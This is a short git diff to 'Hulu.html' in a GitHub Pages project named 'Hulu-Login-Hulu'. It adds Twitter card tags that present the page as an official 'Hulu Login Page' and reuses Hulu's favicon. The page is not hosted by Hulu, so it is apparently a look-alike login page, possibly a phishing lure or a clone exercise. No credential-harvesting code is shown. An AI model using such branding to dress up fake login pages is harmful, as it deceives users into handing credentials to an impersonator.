--- a/Hulu.html
+++ b/Hulu.html
@@ -9,6 +9,11 @@
     <meta property="og:image" content="https://louise2003-gg.github.io/Hulu-Login-Hulu/Hulu_Thumbnqail.png">
     <meta property="og:url" content="https://louise2003-gg.github.io/Hulu-Login-Hulu/Hulu.html">
     <meta property="og:type" content="website">
+
+    <meta name="twitter:card" content="summary_large_image"> 
+    <meta name="twitter:title" content="Hulu Login Page"> 
+    <meta name="twitter:description" content="Login to Hulu to watch your favorite shows!"> <meta name="twitter:image" content="https://louise2003-gg.github.io/Hulu-Login-Hulu/Hulu_Thumbnqail.png">
+
     <link rel="shortcut icon" href="//assetshuluimcom-a.akamaihd.net/h3o/icons/favicon.ico.png" type="image/vnd.microsoft.icon" class="jsx-533771383">
     <script src="https://cdn.jsdelivr.net/npm/@tailwindcss/browser@4"></script>
 </head>
